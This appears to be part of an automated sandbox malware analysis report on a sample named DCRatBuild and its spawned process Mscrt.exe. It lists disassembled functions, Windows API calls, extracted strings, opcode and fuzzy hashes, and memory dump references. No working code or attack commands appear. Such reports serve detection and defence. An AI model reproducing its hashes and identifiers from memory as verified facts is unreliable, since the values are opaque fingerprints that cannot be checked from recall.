Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 1a4cd07283888cd0823c3b751806f999f22296e02049bf0c0fb0c6e7e4682007
Instruction ID: b47c5b77064318cefe2cd3b7d12c703c08ed4a882451f8366800e43ebfe1d7ef
Opcode Fuzzy Hash: 1a4cd07283888cd0823c3b751806f999f22296e02049bf0c0fb0c6e7e4682007
Instruction Fuzzy Hash: DE01F563514321B99A306B758C86DABB7ECEE957B0B90448EF544D6182EF20D88182F1

Function 00B2101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00B21160,?,00000000,00000000), ref: 00B21043
SetThreadPriority.KERNEL32(?,00000000), ref: 00B2108A

Part of subcall function 00B16C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B16C54

Strings

CreateThread failed, xrefs: 00B2104F

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: c3bba74061312600e1c7bad8e2cdaf15dc3f1ae8204b75aec40d902e6515eef4
Instruction ID: c0ac005afad9a9a51baf1186067371ae89f86648fc6385db25da7994a1672bb7
Opcode Fuzzy Hash: c3bba74061312600e1c7bad8e2cdaf15dc3f1ae8204b75aec40d902e6515eef4
Instruction Fuzzy Hash: F8012B753043196BD3345F68BC41B7673D8EB50752F2408AEF946532C0CEA069844624

Function 00B11316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00B1E2E8: _swprintf.LIBCMT ref: 00B1E30E
Part of subcall function 00B1E2E8: _strlen.LIBCMT ref: 00B1E32F
Part of subcall function 00B1E2E8: SetDlgItemTextW.USER32(?,00B4E274,?), ref: 00B1E38F
Part of subcall function 00B1E2E8: GetWindowRect.USER32(?,?), ref: 00B1E3C9
Part of subcall function 00B1E2E8: GetClientRect.USER32(?,?), ref: 00B1E3D5

GetDlgItem.USER32(00000000,00003021), ref: 00B1135A
SetWindowTextW.USER32(00000000,00B435F4), ref: 00B11370

Strings

0, xrefs: 00B11319

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: ef0edce618b1e110b5d61bcaa02c6f1843e3ee67054161ee0000585fba8591f4
Instruction ID: fd922bf82bf4d5bcd940698cb2ab7c2669a4c900d23a051c8235857177a86a7f
Opcode Fuzzy Hash: ef0edce618b1e110b5d61bcaa02c6f1843e3ee67054161ee0000585fba8591f4
Instruction Fuzzy Hash: B0F0A430104288B6DF150F589C0D7EA3BD8EF00745F984AD4FE58519E9CB74C9D4EA54

Function 00B20FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00B21206,?), ref: 00B20FEA
GetLastError.KERNEL32(?), ref: 00B20FF6

Part of subcall function 00B16C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B16C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B20FFF

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: e412f47869b0aaddd81a5a347d05b5aa6304d2ef10037ae6eaac3c6267fa50de
Instruction ID: eb6986a698f4d9d40ae288786f9ab19d3004a0cd4b4e47d9e3ed228fe697446b
Opcode Fuzzy Hash: e412f47869b0aaddd81a5a347d05b5aa6304d2ef10037ae6eaac3c6267fa50de
Instruction Fuzzy Hash: 70D02B3250853036C61037286C06FAF3994EB22B32B540B94F038522F1CF100BC156D2

Function 00B1E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00B1DA55,?), ref: 00B1E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B1DA55,?), ref: 00B1E2B1

Strings

RTL, xrefs: 00B1E2AB

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 3e02b49bdccc56a9f1e9f8867fd259f017d1dd3599da4a77519d51fbf5ffd6da
Instruction ID: f5d5d6dbb9a0479a50cd9baec504be6bc2d0e7aadc8f906e56d9895061f626c5
Opcode Fuzzy Hash: 3e02b49bdccc56a9f1e9f8867fd259f017d1dd3599da4a77519d51fbf5ffd6da
Instruction Fuzzy Hash: FEC0123128071066EF342B646C0DF876AD8AB02F51F1D058CB681EA2E1DAA6CA8086E0

Analysis Process: Mscrt.exePID: 7884, Parent PID: 7832COMMON

Executed Functions

Function 00007FFD9BFE3F30 Relevance: .8, Instructions: 836COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6563939e1c505af663729c769099f14bf0a070a54f05f3e1315f42d6d2cd6387
Instruction ID: 3993e5c6cd9b20a477e055b4c7254cc96eb100b1d6b49311a7e24ca010de8267
Opcode Fuzzy Hash: 6563939e1c505af663729c769099f14bf0a070a54f05f3e1315f42d6d2cd6387
Instruction Fuzzy Hash: 6542F630A0D64D8FDBA8DF58C865AB877E1FF85314F1102BDD05EC72A2DA25AD46CB81

Function 00007FFD9BC5864F Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4c3b2ef2555621fff66e099c32a693ccb0ae590cf0477390902c5008253cb1
Instruction ID: 79660ebe6e298df8c4a62d7ea27ab85f5d3c45050f7dd265b3d7b6d5bd6e36e3
Opcode Fuzzy Hash: 2a4c3b2ef2555621fff66e099c32a693ccb0ae590cf0477390902c5008253cb1
Instruction Fuzzy Hash: A442B070A1D51A8FEB6CDFA8C4A06B877A1FF58300F5041BDD45ED729ACB78A981CB41

Function 00007FFD9B890B3F Relevance: 3.8, Strings: 3, Instructions: 53COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FFD9B890B46
!k9, xrefs: 00007FFD9B890B4E
c9, xrefs: 00007FFD9B890B56

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: b17e6708e57599d869ab5c0d890bfa8a49ccbd1005df4323ac98eb3e33179c7a
Instruction ID: c0913fbc211a29d471259265c116418e12e433800a9c531c4ca35e85b956dfa0
Opcode Fuzzy Hash: b17e6708e57599d869ab5c0d890bfa8a49ccbd1005df4323ac98eb3e33179c7a
Instruction Fuzzy Hash: DC01783B72A92A8FC7106B7DFCA01D8FB80EB95136B8602BBC544C71A2F250185EC3D0

Function 00007FFD9BC51685 Relevance: 2.0, Strings: 1, Instructions: 706COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9BC51AF7

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 915f81c5f3a898d63f083b8d59561036277affc2c6a487f0d611ebb889a93bfe
Instruction ID: 595e772f8e7e9db66c8b2e747d6ba81499a59c5f4d450400a90fa13a26f653e2
Opcode Fuzzy Hash: 915f81c5f3a898d63f083b8d59561036277affc2c6a487f0d611ebb889a93bfe
Instruction Fuzzy Hash: 64223230A1DA0A4FD768DFA8D89597973E1FF95310B1405BED08AC72A7EA25F843C781

Function 00007FFD9BC5F258 Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

C@, xrefs: 00007FFD9BC5F2C7, 00007FFD9BC5F367

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID: C@
API String ID: 0-1236912586
Opcode ID: 5bcf2f1d6d39f7fe004773ee9b85a4eddbd25ca6267cf7fe820312c68bc4d84f
Instruction ID: 862fd7676ee01bab9bd7db6af329140c092b3ef5b12aacef3f6b79e8f71e35e6
Opcode Fuzzy Hash: 5bcf2f1d6d39f7fe004773ee9b85a4eddbd25ca6267cf7fe820312c68bc4d84f
Instruction Fuzzy Hash: FCB1C33061E6598FEB5DCF68C4E05B43BA1FF49310B6502BDC84ACB69BC668F981CB40

Function 00007FFD9B890940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

dM_H, xrefs: 00007FFD9B89C06E

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID: dM_H
API String ID: 0-2825267682
Opcode ID: a3beaec5f891f57912e8452a0abd89a21dfa771b312ff57a5795db7c90a04a08
Instruction ID: 3919670b5721665d766250302b92628883ba60708743b286d97c246e9d3a3039
Opcode Fuzzy Hash: a3beaec5f891f57912e8452a0abd89a21dfa771b312ff57a5795db7c90a04a08
Instruction Fuzzy Hash: 44510A7170CB084FEB58DB1CA89657577D1EB9D720F14016EF48DC32A2DA35BC428B86

Function 00007FFD9BC5EEC8 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC5EF42

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8855cbc7eb60e1c767cefb73b1e935000560225219d509fa52ac882bf289b2c5
Instruction ID: 4ba8e14dbd8b3ca823e8a0d7f6c54f903e1c46ff817650c3dac79beb51222aef
Opcode Fuzzy Hash: 8855cbc7eb60e1c767cefb73b1e935000560225219d509fa52ac882bf289b2c5
Instruction Fuzzy Hash: E7515D71E0E64E8FDB58DFE8C8A05BDB7B1EF44300F1541BAD01AE7292DAB46A41CB50

Function 00007FFD9BC583D8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC58452

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: de15cde7f2faeefd9209c00e3510ebc5d926a646bce71110c1c38cd0f1f4409f
Instruction ID: f15ee4d3b68aa4a43516e333591cd02f9b307e1b553b68094a8180d8694d43cb
Opcode Fuzzy Hash: de15cde7f2faeefd9209c00e3510ebc5d926a646bce71110c1c38cd0f1f4409f
Instruction Fuzzy Hash: CA515B30E0D54E9FEB58DBE8D4605BDB7B1FF48300F5140BAD01AE72A6DA786A05CB40

Function 00007FFD9BC50481 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1074fd1252ad361aad312eceb18e5fb6af133c2323bf2283d270836a1ea11f72
Instruction ID: 98afc6889577f27ff2579804b38a112645f2a064a4cfd1d8eda37f1b63b5fd4b
Opcode Fuzzy Hash: 1074fd1252ad361aad312eceb18e5fb6af133c2323bf2283d270836a1ea11f72
Instruction Fuzzy Hash: 99E11630B0EB0A8FE378DBA8C4A15B977E1FF45704B15057DC48EC75A2DE68B9428781

Function 00007FFD9BC59691 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ce730f6e2df7018ea417fe5f95070c40337aff9b82ea9c9f96ab21ed23d0d6
Instruction ID: db0c5bca69575d9f84e8d40c4d4c2617a6106a8c02da638110ec96831c5bb202
Opcode Fuzzy Hash: 17ce730f6e2df7018ea417fe5f95070c40337aff9b82ea9c9f96ab21ed23d0d6
Instruction Fuzzy Hash: C8D1E530B0EB0A4FE378CBB4C4A85B977E1FF44304B5545BEC09E875A2DEA9B9428751

Function 00007FFD9BFEF2DA Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da2aa5946116b547af29e0c07d05fda57f6c8c0b22ff19ccfd66645bb31ae352
Instruction ID: 1822c243feaa2c48376ae491c74c99bbd217dc43ba3a83ccfb1502abf8e05dfd
Opcode Fuzzy Hash: da2aa5946116b547af29e0c07d05fda57f6c8c0b22ff19ccfd66645bb31ae352
Instruction Fuzzy Hash: EFE1B13061A64A8FEB59CF58C0E05B537A1FF45311B5146FDC84B8B6AACB39F981CB81

Function 00007FFD9BFEC242 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2874b0f985e641e2cb3b035802d96d5df2ee2125c6e82e0ae3003ca0eac782f5
Instruction ID: e7e001a323d8ee22d121fc74049a7fb2e677012fd2f747961ac3ada67ed025e6
Opcode Fuzzy Hash: 2874b0f985e641e2cb3b035802d96d5df2ee2125c6e82e0ae3003ca0eac782f5
Instruction Fuzzy Hash: A0B16D3160E68D4FE369DF6898655F93BD0FF45320B0503BAE09EC74B3DA19A916C782

Function 00007FFD9BC5866F Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce3703e94fa47c95e10928816f0a581b75d2e953f42ba487ad83bb93537d5c2
Instruction ID: a8724edce90dadf9479bb4fa06f25a20834d1081700a31232aa838770a3f36a8
Opcode Fuzzy Hash: 3ce3703e94fa47c95e10928816f0a581b75d2e953f42ba487ad83bb93537d5c2
Instruction Fuzzy Hash: 44C1DF3061E55A8BEB1CCFA4C4E05B937A1FF45310B5146BDC89B8B69BCA78F941CB41

Function 00007FFD9BFEEB72 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 299412b14cfddd4c05b3ac5508d205c9213f3d2b55b1295a55c9deddcee29919
Instruction ID: c9ac36f00f264bfc4fd4bba3dde03784953a98b81ff6ebfb732ec8e0adfa4397
Opcode Fuzzy Hash: 299412b14cfddd4c05b3ac5508d205c9213f3d2b55b1295a55c9deddcee29919
Instruction Fuzzy Hash: A7C10630B0994A4FE7A9DF68D4A06B4B7E1FF58300F4542B9D04EC7AA6DB39B951C780

Function 00007FFD9BC57F02 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204270c0bdb4a0b1564a5d6cd679ec7a31d484c55a8ada191a30197d15c5054d
Instruction ID: 68f97671860e9bf1d4b1c70ec587986c49bc7041b61088e89dc1f0d0153f8637
Opcode Fuzzy Hash: 204270c0bdb4a0b1564a5d6cd679ec7a31d484c55a8ada191a30197d15c5054d
Instruction Fuzzy Hash: C9C1F530B0DA4A4FE759DBB8C4A06B8B7A1FF58300F55417AC04EC7A96DB68B951C790

Function 00007FFD9BC5E9F2 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 995ef6e7eaea53b96ccf916db107c0ee3d83456d26b77ffaede80c7eab5eee99
Instruction ID: 8d35154623bfdcf0525aa139241f8a8630a378f57be658baf6d16c90cfdf3235
Opcode Fuzzy Hash: 995ef6e7eaea53b96ccf916db107c0ee3d83456d26b77ffaede80c7eab5eee99
Instruction Fuzzy Hash: 32C1D470B0DA4B8FE759DFA8C0A06B8B7A1FF54300F5541B9D08EC7A96DB68F9518780

Function 00007FFD9BFE3487 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3fb592a8cbae55ce97af280a8aa94803725ebd54117eec915998f0604e16130
Instruction ID: a940f14035835b32b1d10eb55ffa106783c1154844fec583e94858fd0f540533
Opcode Fuzzy Hash: a3fb592a8cbae55ce97af280a8aa94803725ebd54117eec915998f0604e16130
Instruction Fuzzy Hash: C521D762F0F19F8AF63B5EF978794F826909F51314F1603B7D04E861E2DD4E3A495282

Function 00007FFD9BFEC567 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26ef694c39b862530450f9ad92c38be7e28d4d2fd854043fe581e1ca95f0b170
Instruction ID: 71e7e3b1b18984475bfe9123ee66b839170dc5650c194ef448c0df88e53d17d5
Opcode Fuzzy Hash: 26ef694c39b862530450f9ad92c38be7e28d4d2fd854043fe581e1ca95f0b170
Instruction Fuzzy Hash: 4B212B23F0E6AB8AF3396AE864314F85B409F15370F1A0377E14D970E3DE0E29415392

Function 00007FFD9BC558D7 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 611617dcdbb07201a8d2e02822a151a95a6f0a67ce8b12d58683fcb4ccde9504
Instruction ID: 590adeb852730b5d7400f52feca776940e39951e27d37f748c7f243fdba57742
Opcode Fuzzy Hash: 611617dcdbb07201a8d2e02822a151a95a6f0a67ce8b12d58683fcb4ccde9504
Instruction Fuzzy Hash: 9F21A521F0F69B86F77956F428792FC7650AF40224F2A01BBD48D470E7ED8C3A455392

Function 00007FFD9BC5C3FC Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20414e5958884cd2e702e5a0d6a6af5bea93591b5fec373e2d1dde45ce9c740e
Instruction ID: a105405e3153a0b4c96b93d43c280736779a940be5ad148dae45f7861fb9ac57
Opcode Fuzzy Hash: 20414e5958884cd2e702e5a0d6a6af5bea93591b5fec373e2d1dde45ce9c740e
Instruction Fuzzy Hash: 1F21A256F0F59B86F73956F868715BE6E409F51612F5A11B7C04E860E3DCCC3B4152C2

Function 00007FFD9BFE5B1A Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b432069df48ee7ba32fb58c9f34407049ffff3a9b76d88f9bdb0112c67e00dc9
Instruction ID: 1f3846baed253c111b0db5e1b99b4e14c6409017016eb94f2146a7e2bb8e8e53
Opcode Fuzzy Hash: b432069df48ee7ba32fb58c9f34407049ffff3a9b76d88f9bdb0112c67e00dc9
Instruction Fuzzy Hash: 5CA11330A0EA4A8FE769DF68C0A46B4B7A1FF15300F4542B9C04EC7A97DB29F951C791

Function 00007FFD9BFE6326 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 360a8084675fa0812cbe709276daaab99ea0ae8122a23753c9a6e213236b170e
Instruction ID: 471533534450e62407b7863699b61d149a9c22a994820c941e2eb9fe6e524386
Opcode Fuzzy Hash: 360a8084675fa0812cbe709276daaab99ea0ae8122a23753c9a6e213236b170e
Instruction Fuzzy Hash: 69B1D230619A5A9FEB58CF58C0E05B437A1FF45310B5556BDC84BCB69ACA39F981CB80

Function 00007FFD9BFEBDF2 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cab1d8b62d74de823acdc25f2115831ea31f0e018c8e983aa9eccc0769abb0a
Instruction ID: a263d47d09b9cbef725d12502d0b4ea5056ead612488fd2a96959af7cffd7861
Opcode Fuzzy Hash: 5cab1d8b62d74de823acdc25f2115831ea31f0e018c8e983aa9eccc0769abb0a
Instruction Fuzzy Hash: 9E815731B0E5594FE769EBA898A5BF97BD1EF45310F0502BAD00DC71E3DE2969468280

Function 00007FFD9BFEC545 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1f767eed558c491ff03b8c3ef4ccda6a2cdd8bedf050e4d7ebd21e8e178f5fa
Instruction ID: e688a0de708639d74588f646bccf877dd58d95053b55ef9ea1cd4fbd38b439b0
Opcode Fuzzy Hash: c1f767eed558c491ff03b8c3ef4ccda6a2cdd8bedf050e4d7ebd21e8e178f5fa
Instruction Fuzzy Hash: A911D523F1E19F86F6381EE464314BD1A409F55750F26077AF44E961E7DE4F2A411292

Function 00007FFD9BC5DF36 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
